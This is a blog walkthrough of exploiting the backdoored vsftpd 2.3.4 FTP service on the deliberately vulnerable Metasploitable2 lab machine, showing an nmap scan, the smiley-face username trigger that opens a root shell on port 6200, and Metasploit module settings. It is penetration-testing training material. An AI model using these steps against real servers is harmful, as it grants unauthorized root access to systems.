Metasploitable 2 Series – VSFTPD

This is the first of our many blog posts, where we will be exploring different techniques to exploit Metasploitable2 machine. In this post, I will focus on ftp service running VSFTPD application.

 

Metasploitable2

The Metasploitable virtual machine created by Rapid7 is an intentionally vulnerable version of Ubuntu Linux designed for demonstrating common security vulnerabilities. This is the second version of Metasploitable and includes even more vulnerabilities than the original image. This virtual machine is compatible with VMware, Virtualbox and other common virtual machine platforms. Metasploitable’s network interfaces, by default are bound to the NAT and Host-Only network adapters. A video tutorial of how to install Metasploitable on Virtualbox is available on Rapid7 website.

 

Download Metasploitable2

https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

 

Getting Started

After installing the virtual machine, go ahead and power it up; after it boots up login to console with username: msfadmin and password: msfadmin. Use the ifconfig command to verify the IP address of the machine.

ifconfig.png

In our case, the IP address of Metasploitable virtual machine is 10.0.19.235. And the machine that we will be using for attacking purposes, runs Kali Linux with IP address 10.0.18.250.

 

Services

From our attacking machine, we identify the open ports on this virtual machine using a little tool called nmap. The following command will scan for all 65535 TCP ports on our vulnerable virtual machine.

root@SPaWn:~# nmap -p1-65535 10.0.19.235

metasploitable nmap scan.png

You can see lots of open ports in the above screenshot, but we will only focus on FTP port 21 for now.

 

VSFTPD

Since we have made no secret to what application is running behind port 21 (VSFTPD), and in actual penetration testing scenarios we don’t know what service is running behind which port, therefore we will proceed as such.

Let’s do a bit in-depth scan against port 21 using nmap.

vsftpd nmap scan.png

Nmap can also used as a vulnerability scanner by leveraging multitudes of scripts provided with it. This “Scripting Engine” feature is what makes nmap a very powerful tool during penetration testing assignments.

vsftpd backdoor.png

Our scan clearly indicates that this version of vsFTPd contains a backdoor and can be  exploited to gain a root shell. After going through the reference pages from our last nmap scan, we found out that if a username is sent that ends with a “:)” smiley face, the backdoor’d version of vsFTPd will open a listening shell on port 6200.

 


Method-1: Manual

Let’s first check the status of port 6200 on our vulnerable virtual machine using netcat.

port 6200 connection refused.png

A “Connection refused” message signals that the port on target machine is closed. Now connect to FTP service and provide username: letmein:) and password: hahaha.

ftpconnect.png

Let’s check the status of port 6200 now.

port 6200 now open.png

Our vulnerable machine is listening on port 6200 and connecting to this port now will give us a root shell.

method 1 shell.png

 


Method-2: Metasploit

To exploit this vulnerability using metasploit framework, type the command “msfconsole” from your Kali Linux command prompt. Once the metasploit is launched, search for “VSFTPD”. You will probably get only one hit against your search, and then use this exploit with the following command.

msf > use exploit/unix/ftp/vsftpd_234_backdoor

After selecting your exploit, set the values to make the exploit work, such as the following:

set RHOST W.X.Y.Z

set PAYLOAD cmd/unix/interact

set LHOST A.B.C.D

set LPORT 12345

where W.X.Y.Z and A.B.C.D are the IP addresses of our Target and Attacking machines respectively. After setting the values for the VSFTPD backdoor exploit, we can either use the command “run” or “exploit” to fire the exploit against target machine. A successful exploitation will get us a root shell.

vsftpd exploit-metasploit.png

 


Method-3: Exploit code

You can also create an exploit code for this vulnerability in any language of your choice. Since we are already familiar with how this vulnerability affects the product, therefore we are using an exploit code written in our favorite language python. This exploit requires two parameters 1. IP address of the target machine and 2. port number. After firing the exploit, we will get a root shell.

vsftpd-exploit-code.png

EOF.

Advertisements

2 thoughts on “Metasploitable 2 Series – VSFTPD

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s